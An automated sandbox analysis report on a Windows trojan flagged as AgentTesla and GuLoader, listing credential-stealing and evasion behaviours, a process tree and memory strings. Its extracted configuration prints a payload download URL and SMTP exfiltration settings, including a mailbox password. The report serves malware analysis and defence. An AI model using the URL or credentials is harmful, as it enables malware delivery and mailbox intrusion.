Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Overview

General Information

Sample Name:	SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe
Analysis ID:	634670
MD5:	67a4759a7b2fcb1a7e5b368fc150b974
SHA1:	592934bd8f6606f80a890008008a621f7abda152
SHA256:	19762fa9a397bf711cb2aa16f78915d4beaf49e9b67ffccfa3e3b01e35c7289a
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected AgentTesla

Yara detected GuLoader

Found malware configuration

Multi AV Scanner detection for submitted file

Tries to steal Mail credentials (via file / registry access)

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Sample is not signed and drops a device driver

DLL side loading technique detected

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

NDIS Filter Driver detected (likely used to intercept and sniff network traffic)

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

C2 URLs / IPs found in malware configuration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Found evasive API chain checking for process token information

Creates driver files

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Spawns drivers

PE file contains more sections than normal

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

Contains functionality to shutdown / reboot the system

PE file contains sections with non-standard names

Stores large binary data to the registry

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

AV process strings found (often used to terminate AV products)

PE file does not import any functions

Sample file is different than original file name gathered from version info

Enables security privileges

Contains functionality to enumerate device drivers

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates or modifies windows services

Queries disk information (often used to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe (PID: 3120 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe" MD5: 67A4759A7B2FCB1A7E5B368FC150B974)

CasPol.exe (PID: 3872 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 4968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

mpam-e428c3f6.exe (PID: 1304 cmdline: "C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-e428c3f6.exe" /q WD MD5: 89D4A3575EC6AEEFB442C18A41A18DDA)

MpSigStub.exe (PID: 1656 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe /stub 1.1.18500.10 /payload 1.367.502.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-e428c3f6.exe /q WD MD5: 01F92DC7A766FF783AE7AF40FD0334FB)

svchost.exe (PID: 7932 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: F586835082F632DC8D9404D83BC16316)

wevtutil.exe (PID: 5392 cmdline: C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\3FCB5F68-CD33-FF2F-34AE-798C9A7026D4.man MD5: C57C1292650B6384903FE6408D412CFA)

conhost.exe (PID: 9144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

wevtutil.exe (PID: 7292 cmdline: C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\3FCB5F68-CD33-FF2F-34AE-798C9A7026D4.man "/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll" "/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll" "/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll" MD5: C57C1292650B6384903FE6408D412CFA)

conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

mpengine.exe (PID: 7860 cmdline: C:\ProgramData\Microsoft\Windows Defender\Scans\\MpPayloadData\mpengine.exe MD5: C84EBFCFAFEB07D863C3ED18F6FBD40F)

conhost.exe (PID: 8572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

MpKslDrv.sys (PID: 4 cmdline: MD5: 97D3A85D7EF930E7035DAAC1622AD407)

mpam-60574f34.exe (PID: 2156 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-60574f34.exe MD5: 50BCDEEB6A1DFFF15B62BEDAC2DDACA8)

MpSigStub.exe (PID: 9000 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2203.5 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-60574f34.exe MD5: 01F92DC7A766FF783AE7AF40FD0334FB)

svchost.exe (PID: 6648 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: F586835082F632DC8D9404D83BC16316)

WdNisDrv.sys (PID: 4 cmdline: MD5: B757AF9B44B0C0C75103210D9C7026FF)

NisSrv.exe (PID: 4264 cmdline: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\NisSrv.exe MD5: B7F144CC18AE552E1C3D42051A934902)

svchost.exe (PID: 4912 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: F586835082F632DC8D9404D83BC16316)

svchost.exe (PID: 2928 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: F586835082F632DC8D9404D83BC16316)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "apoio.cliente@asfaltolargo.ptApoioCliente2018!mail.asfaltolargo.ptamorimoffice6@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1c-6Y7E6EFCnEfeUqjiCzqb4bjj7oMV7b"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000000.18323333088.0000000000F30000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: CasPol.exe PID: 3872	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 3872	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1c-6Y7E6EFCnEfeUqjiCzqb4bjj7oMV7b"}
Source: mpam-60574f34.exe.2156.16.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "apoio.cliente@asfaltolargo.ptApoioCliente2018!mail.asfaltolargo.ptamorimoffice6@gmail.com"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Virustotal: Detection: 30%			Perma Link
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	ReversingLabs: Detection: 22%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_2061A178 CryptUnprotectData,	5_2_2061A178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_2061A790 CryptUnprotectData,	5_2_2061A790
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44DC1C4 CreateDirectoryW,FreeLibrary,DecryptFileW,FreeLibrary,FreeLibrary,	7_2_00007FF6F44DC1C4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A1C1C4 CreateDirectoryW,FreeLibrary,DecryptFileW,FreeLibrary,FreeLibrary,	19_2_00007FF7D3A1C1C4

Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\dado

Jump to behavior

Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: ConfigSecurityPolicy.pdb source: MpSigStub.exe, 00000013.00000003.18750149036.000001F8CDE37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpAzSubmit.pdb source: MpSigStub.exe, 00000013.00000003.18751240013.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: NisSrv.pdb source: NisSrv.exe.16.dr
Source:	Binary string: MpRTP.pdb source: mpam-60574f34.exe, 00000010.00000003.18535264051.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18754931951.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WdBoot.pdb source: mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpAdlStub.pdb source: mpam-e428c3f6.exe, 00000003.00000000.18199651604.00007FF74E73F000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: WdFilter.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpAzSubmit.pdbGCTL source: MpSigStub.exe, 00000013.00000003.18751240013.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpSenseComm.pdbGCTL source: MpSigStub.exe, 00000013.00000003.18755428699.000001F8CDE4C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpClient.pdb source: MpSigStub.exe, 00000007.00000003.18393894759.000001DE0F544000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WdDevFlt.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpDetours.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18531267121.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18753195690.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18761615816.000001F8CDE42000.00000004.00000020.00020000.00000000.sdmp, MpDetours.dll0.16.dr
Source:	Binary string: ProtectionManagement.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18544926204.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18758774396.000001F8CDE41000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpSigStub.pdbGCTL source: MpSigStub.exe, 00000007.00000003.18401631614.000001DE0F547000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000007.00000000.18387090699.00007FF6F4507000.00000002.00000001.01000000.0000000A.sdmp, MpSigStub.exe, 00000007.00000002.18489828227.00007FF6F4507000.00000002.00000001.01000000.0000000A.sdmp, MpSigStub.exe, 00000013.00000000.18742830508.00007FF7D3A47000.00000002.00000001.01000000.0000000F.sdmp, MpSigStub.exe, 00000013.00000002.18819564832.00007FF7D3A47000.00000002.00000001.01000000.0000000F.sdmp, MpSigStub.exe, 00000013.00000003.18755716938.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpCommu.pdbGCTL source: MpSigStub.exe, 00000013.00000003.18752568256.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpUxAgent.pdb source: mpam-60574f34.exe, 00000010.00000003.18542110345.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18757096877.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WdFilter.pdb source: mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ProtectionManagement.pdb source: mpam-60574f34.exe, 00000010.00000003.18544926204.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18758774396.000001F8CDE41000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpUxAgent.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18542110345.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18757096877.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WdNisDrv.pdb source: mpam-60574f34.exe, 00000010.00000003.18739844648.0000016C079A3000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MsMpEng.pdbGCTL source: MpSigStub.exe, 00000013.00000003.18757615927.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpSigStub.pdb source: MpSigStub.exe, 00000007.00000003.18401631614.000001DE0F547000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000007.00000000.18387090699.00007FF6F4507000.00000002.00000001.01000000.0000000A.sdmp, MpSigStub.exe, 00000007.00000002.18489828227.00007FF6F4507000.00000002.00000001.01000000.0000000A.sdmp, MpSigStub.exe, 00000013.00000000.18742830508.00007FF7D3A47000.00000002.00000001.01000000.0000000F.sdmp, MpSigStub.exe, 00000013.00000002.18819564832.00007FF7D3A47000.00000002.00000001.01000000.0000000F.sdmp, MpSigStub.exe, 00000013.00000003.18755716938.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpAdlElvtStub.pdb source: mpam-60574f34.exe, 00000010.00000002.18824267770.00007FF700EDF000.00000002.00000001.01000000.0000000E.sdmp, mpam-60574f34.exe, 00000010.00000000.18501623235.00007FF700EDF000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: MpOAV.pdb source: mpam-60574f34.exe, 00000010.00000003.18533279750.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18754550374.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp, MpOAV.dll0.16.dr
Source:	Binary string: MpUpdate.pdbGCTL source: MpSigStub.exe, 00000013.00000003.18756735348.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpCmdRun.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18558489914.0000016C07986000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18752027678.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpRTP.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18535264051.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18754931951.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpAdlElvtStub.pdbGCTL source: mpam-60574f34.exe, 00000010.00000002.18824267770.00007FF700EDF000.00000002.00000001.01000000.0000000E.sdmp, mpam-60574f34.exe, 00000010.00000000.18501623235.00007FF700EDF000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: MpOAV.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18533279750.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18754550374.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp, MpOAV.dll0.16.dr
Source:	Binary string: MpDetoursCopyAccelerator.pdb source: MpSigStub.exe, 00000013.00000003.18761941166.000001F8CDE42000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpCmdRun.pdb source: mpam-60574f34.exe, 00000010.00000003.18558489914.0000016C07986000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18752027678.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ConfigSecurityPolicy.pdbGCTL source: MpSigStub.exe, 00000013.00000003.18750149036.000001F8CDE37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpCopyAccelerator.pdbGCTL source: MpSigStub.exe, 00000013.00000003.18761414141.000001F8CDE42000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18752921990.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp, MpCopyAccelerator.exe0.16.dr
Source:	Binary string: WdNisDrv.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18739844648.0000016C079A3000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpDlpCmd.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18560328758.0000016C07986000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18753508768.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp, MpDlpCmd.exe.16.dr
Source:	Binary string: MpDetours.pdb source: mpam-60574f34.exe, 00000010.00000003.18531267121.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18753195690.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18761615816.000001F8CDE42000.00000004.00000020.00020000.00000000.sdmp, MpDetours.dll0.16.dr
Source:	Binary string: WdDevFlt.pdb source: mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpSenseComm.pdb source: MpSigStub.exe, 00000013.00000003.18755428699.000001F8CDE4C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpCommu.pdb source: MpSigStub.exe, 00000013.00000003.18752568256.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpDetoursCopyAccelerator.pdbGCTL source: MpSigStub.exe, 00000013.00000003.18761941166.000001F8CDE42000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpAdlStub.pdbGCTL source: mpam-e428c3f6.exe, 00000003.00000000.18199651604.00007FF74E73F000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: MpPayload.pdbGCTL source: mpengine.exe, 0000000C.00000002.18479667093.00007FF71C58B000.00000002.00000001.01000000.0000000D.sdmp, mpengine.exe, 0000000C.00000000.18476339200.00007FF71C58B000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: WdBoot.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: NisSrv.pdbGCTL source: NisSrv.exe.16.dr
Source:	Binary string: MpDlpCmd.pdb source: mpam-60574f34.exe, 00000010.00000003.18560328758.0000016C07986000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18753508768.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp, MpDlpCmd.exe.16.dr
Source:	Binary string: MsMpEng.pdb source: MpSigStub.exe, 00000013.00000003.18757615927.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpCopyAccelerator.pdb source: MpSigStub.exe, 00000013.00000003.18761414141.000001F8CDE42000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18752921990.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp, MpCopyAccelerator.exe0.16.dr
Source:	Binary string: MpClient.pdbGCTL source: MpSigStub.exe, 00000007.00000003.18393894759.000001DE0F544000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WaaSMedicSvc.pdb source: waasmedic.20220526_155057_892.etl.23.dr
Source:	Binary string: MpUpdate.pdb source: MpSigStub.exe, 00000013.00000003.18756735348.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpPayload.pdb source: mpengine.exe, 0000000C.00000002.18479667093.00007FF71C58B000.00000002.00000001.01000000.0000000D.sdmp, mpengine.exe, 0000000C.00000000.18476339200.00007FF71C58B000.00000002.00000001.01000000.0000000D.sdmp

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405C49
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_00406873 FindFirstFileW,FindClose,	1_2_00406873
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_0040290B FindFirstFileW,	1_2_0040290B
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44DADEC FindFirstFileW,FindNextFileW,FindClose,FindClose,	7_2_00007FF6F44DADEC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44DB030 FindNextFileW,FindClose,FindFirstFileW,	7_2_00007FF6F44DB030
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F448F810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle,	7_2_00007FF6F448F810
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F4502504 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	7_2_00007FF6F4502504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A1B030 FindNextFileW,FindClose,FindFirstFileW,	19_2_00007FF7D3A1B030
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A1ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose,	19_2_00007FF7D3A1ADEC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A42504 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_00007FF7D3A42504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39CF810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle,	19_2_00007FF7D39CF810

Networking

NDIS Filter Driver detected (likely used to intercept and sniff network traffic)

Source: WdNisDrv.sys.16.dr

Static PE information: Found NDIS imports: FwpmTransactionAbort0, FwpmTransactionCommit0, FwpmTransactionBegin0, FwpmEngineOpen0, FwpmSubLayerAdd0, FwpmEngineClose0, FwpmFilterAdd0, FwpmCalloutAdd0, FwpmSubLayerDeleteByKey0, FwpmCalloutDeleteByKey0, FwpmFilterDeleteByKey0, FwpsCalloutUnregisterByKey0, FwpsQueryPacketInjectionState0, FwpsInjectTransportSendAsync0, FwpsStreamInjectAsync0, FwpsInjectionHandleDestroy0, FwpsInjectionHandleCreate0, FwpsFlowRemoveContext0, FwpsFlowAssociateContext0, FwpsCalloutRegister2, FwpsCalloutUnregisterById0, FwpsAllocateNetBufferAndNetBufferList0, FwpsFreeNetBufferList0, FwpsCopyStreamDataToBuffer0, FwpsFlowAbort0

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1c-6Y7E6EFCnEfeUqjiCzqb4bjj7oMV7b

Source: Joe Sandbox View	IP Address: 209.197.3.8 209.197.3.8
Source: Joe Sandbox View	IP Address: 20.189.173.22 20.189.173.22

Source: CasPol.exe, 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://OGHYwH.com
Source: CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ac.economia.gob.mx/cps.html0
Source: CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ac.economia.gob.mx/last.crl0G
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://acedicom.edicomgroup.com/doc0
Source: CasPol.exe, 00000005.00000003.18602156620.0000000020831000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: CasPol.exe, 00000005.00000003.18602156620.0000000020831000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
Source: CasPol.exe, 00000005.00000002.23252711793.000000001F909000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23253044443.000000001F941000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23245892965.000000001D994000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: CasPol.exe, 00000005.00000003.19683625040.000000001F957000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23253192039.000000001F95A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
